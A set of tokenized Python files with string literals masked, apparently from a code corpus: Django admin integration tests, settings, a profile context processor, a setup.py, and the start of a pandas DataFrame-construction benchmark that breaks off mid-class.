create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> params = { '<STR_LIT:action>' : '<STR_LIT>' } <EOL> response = self . client . post ( <EOL> reverse ( "<STR_LIT>" ) , params , follow = True ) <EOL> self . assertContains ( <EOL> response , "<STR_LIT>" ) <EOL> def test_search_posts ( self ) : <EOL> Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> Post . objects . create ( <EOL> title = "<STR_LIT>" , body = "<STR_LIT>" ) <EOL> params = { "<STR_LIT:q>" : "<STR_LIT>" } <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertNotContains ( response , "<STR_LIT>" ) <EOL> def test_renderer_title ( self ) : <EOL> Post . objects . create ( <EOL> title = '<STR_LIT>' , body = '<STR_LIT:body>' , published = False ) <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_renderer_body ( self ) : <EOL> Post . objects . create ( <EOL> title = '<STR_LIT:title>' , body = '<STR_LIT>' , published = False ) <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_renderer_unpublished ( self ) : <EOL> Post . objects . create ( title = '<STR_LIT:title>' , body = '<STR_LIT:body>' , published = False ) <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_renderer_published ( self ) : <EOL> Post . objects . create ( title = '<STR_LIT:title>' , body = '<STR_LIT:body>' , published = True ) <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_drilldowns ( self ) : <EOL> self . 
_create_posts ( ) <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , "<STR_LIT>" , <NUM_LIT:5> ) <EOL> response = self . client . get ( <EOL> "<STR_LIT>" % ( <EOL> reverse ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> ) <EOL> ) <EOL> self . assertContains ( <EOL> response , <EOL> '<STR_LIT>' , <EOL> ) <EOL> self . assertContains ( <EOL> response , <EOL> '<STR_LIT>' , <EOL> ) <EOL> self . assertContains ( response , "<STR_LIT>" , <NUM_LIT:4> ) <EOL> response = self . client . get ( <EOL> "<STR_LIT>" % ( <EOL> reverse ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> ) <EOL> ) <EOL> self . assertContains ( response , "<STR_LIT>" , <NUM_LIT:2> ) <EOL> self . assertContains ( <EOL> response , <EOL> '<STR_LIT>' , <EOL> ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> response = self . client . get ( <EOL> "<STR_LIT>" % ( <EOL> reverse ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> ) <EOL> ) <EOL> self . assertContains ( response , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> self . assertContains ( <EOL> response , <EOL> '<STR_LIT>' , <EOL> ) <EOL> self . assertContains ( <EOL> response , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertContains ( <EOL> response , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_ordering ( self ) : <EOL> self . _create_posts ( ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> model_admin = response . context [ "<STR_LIT>" ] . model_admin <EOL> response_queryset = response . context [ "<STR_LIT>" ] <EOL> manual_queryset = Post . objects . order_by ( "<STR_LIT>" , "<STR_LIT:title>" ) <EOL> zipped_queryset = zip ( <EOL> list ( response_queryset ) , <EOL> list ( manual_queryset ) , <EOL> ) <EOL> self . assertTrue ( all ( [ <EOL> model1 . pk == model2 . pk <EOL> for model1 , model2 in zipped_queryset <EOL> ] ) ) <EOL> self . assertEqual ( <EOL> model_admin . get_ordering ( response . request ) , <EOL> model_admin . 
ordering , <EOL> ) <EOL> def test_all_unselected_action ( self ) : <EOL> self . _create_posts ( ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( all ( [ <EOL> not post . published <EOL> for post in response . context [ "<STR_LIT>" ] <EOL> ] ) ) <EOL> response = self . client . post ( <EOL> reverse ( "<STR_LIT>" ) , <EOL> { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> } , <EOL> follow = True <EOL> ) <EOL> self . assertTrue ( all ( [ <EOL> post . published <EOL> for post in response . context [ "<STR_LIT>" ] <EOL> ] ) ) <EOL> response = self . client . post ( <EOL> reverse ( "<STR_LIT>" ) , <EOL> { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> } , <EOL> follow = True , <EOL> ) <EOL> self . assertTrue ( all ( [ <EOL> post . published <EOL> for post in response . context [ "<STR_LIT>" ] <EOL> ] ) ) <EOL> class PostListTestCustomAction ( BaseIntegrationTest ) : <EOL> def test_publish_action_displayed_in_list ( self ) : <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertInHTML ( <EOL> '<STR_LIT>' , force_text ( response . content ) ) <EOL> def test_publish_selected_items ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published = False ) <EOL> self . assertEqual ( Post . objects . filter ( published = True ) . count ( ) , <NUM_LIT:0> ) <EOL> params = { '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( post . pk ) , <EOL> '<STR_LIT>' : '<STR_LIT:yes>' } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertRedirects ( response , reverse ( "<STR_LIT>" ) ) <EOL> self . assertEqual ( Post . objects . filter ( published = True ) . count ( ) , <NUM_LIT:1> ) <EOL> def test_unpublish_action_displayed_in_list ( self ) : <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertInHTML ( <EOL> '<STR_LIT>' , force_text ( response . 
content ) ) <EOL> def test_unpublish_selected_items ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published = True ) <EOL> self . assertEqual ( Post . objects . filter ( published = True ) . count ( ) , <NUM_LIT:1> ) <EOL> params = { '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( post . pk ) } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertRedirects ( response , reverse ( "<STR_LIT>" ) ) <EOL> self . assertEqual ( Post . objects . filter ( published = True ) . count ( ) , <NUM_LIT:0> ) <EOL> class PostDetailViewTest ( BaseIntegrationTest ) : <EOL> def test_view_ok ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" , <EOL> args = ( post . pk , ) ) ) <EOL> self . assertContains ( response , post . title ) <EOL> class PostCreateViewTest ( BaseIntegrationTest ) : <EOL> def test_view_ok ( self ) : <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertNotIn ( <EOL> '''<STR_LIT>''' , force_text ( response . content ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_create_post ( self ) : <EOL> post_data = { <EOL> "<STR_LIT>" : u'<STR_LIT:2>' , <EOL> "<STR_LIT>" : u'<STR_LIT:0>' , <EOL> "<STR_LIT>" : u'<STR_LIT>' , <EOL> "<STR_LIT>" : u'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> "<STR_LIT:title>" : "<STR_LIT>" , <EOL> "<STR_LIT:body>" : "<STR_LIT>" , <EOL> } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , <EOL> post_data , <EOL> follow = True ) <EOL> self . assertTrue ( Post . objects . filter ( title = "<STR_LIT>" ) . exists ( ) ) <EOL> Comment . objects . get ( body = "<STR_LIT>" ) <EOL> self . 
assertRedirects ( response , reverse ( "<STR_LIT>" ) ) <EOL> def test_save_and_add_another_redirects_to_create ( self ) : <EOL> """<STR_LIT>""" <EOL> post_data = { <EOL> "<STR_LIT>" : u'<STR_LIT:2>' , <EOL> "<STR_LIT>" : u'<STR_LIT:0>' , <EOL> "<STR_LIT>" : u'<STR_LIT>' , <EOL> "<STR_LIT>" : u'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> "<STR_LIT:title>" : "<STR_LIT>" , <EOL> "<STR_LIT:body>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT:password>' ) <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , <EOL> post_data ) <EOL> Post . objects . get ( title = '<STR_LIT>' ) <EOL> self . assertRedirects ( response , reverse ( "<STR_LIT>" ) ) <EOL> def test_save_and_continue_editing_redirects_to_update ( self ) : <EOL> """<STR_LIT>""" <EOL> post_data = { <EOL> "<STR_LIT>" : u'<STR_LIT:2>' , <EOL> "<STR_LIT>" : u'<STR_LIT:0>' , <EOL> "<STR_LIT>" : u'<STR_LIT>' , <EOL> "<STR_LIT:title>" : "<STR_LIT>" , <EOL> "<STR_LIT:body>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , <EOL> post_data ) <EOL> post = Post . objects . get ( title = "<STR_LIT>" ) <EOL> self . assertRedirects ( response , reverse ( "<STR_LIT>" , <EOL> args = ( post . pk , ) ) ) <EOL> class PostDeleteViewTest ( BaseIntegrationTest ) : <EOL> def test_view_ok ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" , <EOL> args = ( post . pk , ) ) ) <EOL> self . assertContains ( response , post . title ) <EOL> def test_delete_post ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> response = self . client . post ( reverse ( "<STR_LIT>" , <EOL> args = ( post . pk , ) ) ) <EOL> self . 
assertRedirects ( response , reverse ( "<STR_LIT>" ) ) <EOL> self . assertFalse ( Post . objects . filter ( pk = post . pk ) . exists ( ) ) <EOL> class PostDeleteActionTest ( BaseIntegrationTest ) : <EOL> """<STR_LIT>""" <EOL> def test_confirmation_page ( self ) : <EOL> p1 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> p2 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> post_data = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ p1 . pk , p2 . pk ] <EOL> } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , <EOL> post_data ) <EOL> self . assertContains ( response , p1 . title ) <EOL> self . assertContains ( response , p2 . title ) <EOL> def test_results_page ( self ) : <EOL> p1 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> p2 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> post_data = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ p1 . pk , p2 . pk ] , <EOL> '<STR_LIT>' : '<STR_LIT:yes>' <EOL> } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , <EOL> post_data , follow = True ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> class TestAuthViews ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . client = Client ( ) <EOL> self . user = get_user_model ( ) ( username = '<STR_LIT:user>' , is_staff = True , <EOL> is_superuser = True ) <EOL> self . user . set_password ( "<STR_LIT:password>" ) <EOL> self . user . save ( ) <EOL> def test_login_required_redirect_to_index ( self ) : <EOL> index_path = reverse ( '<STR_LIT>' ) + '<STR_LIT>' <EOL> target_path = reverse ( '<STR_LIT>' ) <EOL> self . assertRedirects ( self . client . get ( target_path ) , index_path ) <EOL> def test_login_required_logined_successful ( self ) : <EOL> index_path = reverse ( '<STR_LIT>' ) <EOL> self . client . login ( username = self . user . 
username , <EOL> password = '<STR_LIT:password>' ) <EOL> self . assertContains ( self . client . get ( index_path ) , <EOL> reverse ( '<STR_LIT>' ) ) <EOL> def test_change_password_for_myself ( self ) : <EOL> self . client . login ( username = self . user . username , <EOL> password = '<STR_LIT:password>' ) <EOL> request = self . client . post ( reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : self . user . pk } ) , <EOL> { '<STR_LIT>' : '<STR_LIT:password>' , <EOL> '<STR_LIT>' : '<STR_LIT:user>' , <EOL> '<STR_LIT>' : '<STR_LIT:user>' } ) <EOL> self . assertRedirects ( request , reverse ( '<STR_LIT>' ) ) <EOL> self . client . logout ( ) <EOL> self . assertFalse ( self . client . login ( username = self . user . username , <EOL> password = '<STR_LIT:password>' ) ) <EOL> self . assertTrue ( self . client . login ( username = self . user . username , <EOL> password = '<STR_LIT:user>' ) ) <EOL> def test_change_password ( self ) : <EOL> self . client . login ( username = self . user . username , <EOL> password = '<STR_LIT:password>' ) <EOL> new_user = get_user_model ( ) ( username = '<STR_LIT>' ) <EOL> new_user . set_password ( "<STR_LIT>" ) <EOL> new_user . save ( ) <EOL> request = self . client . post ( reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : new_user . pk } ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertRedirects ( request , reverse ( '<STR_LIT>' ) ) <EOL> self . client . logout ( ) <EOL> self . assertFalse ( self . client . login ( username = new_user . username , <EOL> password = '<STR_LIT>' ) ) <EOL> self . assertTrue ( self . client . login ( username = new_user . username , <EOL> password = '<STR_LIT>' ) ) <EOL> def test_logout ( self ) : <EOL> self . client . login ( username = self . user . username , <EOL> password = '<STR_LIT:password>' ) <EOL> logout_path = reverse ( '<STR_LIT>' ) <EOL> request = self . client . get ( logout_path ) <EOL> self . 
assertContains ( request , '<STR_LIT>' ) <EOL> index_path = reverse ( '<STR_LIT>' ) + '<STR_LIT>' <EOL> target_path = reverse ( '<STR_LIT>' ) <EOL> self . assertRedirects ( self . client . get ( target_path ) , index_path ) </s>
<s> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> MEDIA_ROOT = '<STR_LIT>' <EOL> MEDIA_URL = '<STR_LIT>' <EOL> ADMIN_MEDIA_PREFIX = '<STR_LIT>' <EOL> SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> AUTH_PROFILE_MODULE = "<STR_LIT>" </s>
<s> from profiletools . utils import get_my_profile_module_name <EOL> def fetch_profile ( request ) : <EOL> """<STR_LIT>""" <EOL> context = { } <EOL> if request . user . is_authenticated ( ) : <EOL> profile_module_name = get_my_profile_module_name ( ) <EOL> profile = getattr ( request , profile_module_name , None ) <EOL> if profile != None : <EOL> context [ profile_module_name ] = profile <EOL> return context </s>
<s> import os <EOL> import sys <EOL> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> version = "<STR_LIT>" <EOL> if sys . argv [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> try : <EOL> import wheel <EOL> except ImportError : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> os . system ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" % ( version , version ) ) <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( ) <EOL> if sys . argv [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> print ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" % ( version , version ) ) <EOL> os . system ( "<STR_LIT>" ) <EOL> sys . exit ( ) <EOL> readme = open ( '<STR_LIT>' ) . read ( ) <EOL> history = open ( '<STR_LIT>' ) . read ( ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def get_requirements ( filename ) : <EOL> f = open ( filename ) . read ( ) <EOL> reqs = [ <EOL> x . strip ( ) for x in f . splitlines ( ) <EOL> if not x . strip ( ) . startswith ( '<STR_LIT:#>' ) <EOL> ] <EOL> return reqs <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = """<STR_LIT>""" , <EOL> long_description = readme + '<STR_LIT>' + history , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> include_package_data = True , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> license = "<STR_LIT>" , <EOL> zip_safe = False , <EOL> keywords = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from . pandas_vb_common import * <EOL> try : <EOL> from pandas . tseries . offsets import * <EOL> except : <EOL> from pandas . core . datetools import * <EOL> class frame_ctor_dtindex_BDayx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BDay ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BDayx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BDayx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BDay ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BDayx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . 
ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BMonthBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BMonthBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BMonthBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BMonthBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BMonthBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . 
columns ] ) <EOL> def time_frame_ctor_dtindex_BMonthBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BMonthEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BMonthEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BMonthEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BMonthEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . 
get_index_for_offset ( BMonthEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BMonthEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BQuarterBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BQuarterBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BQuarterBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . 
start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BQuarterBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BQuarterBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BQuarterBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BQuarterEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BQuarterEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BQuarterEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . 
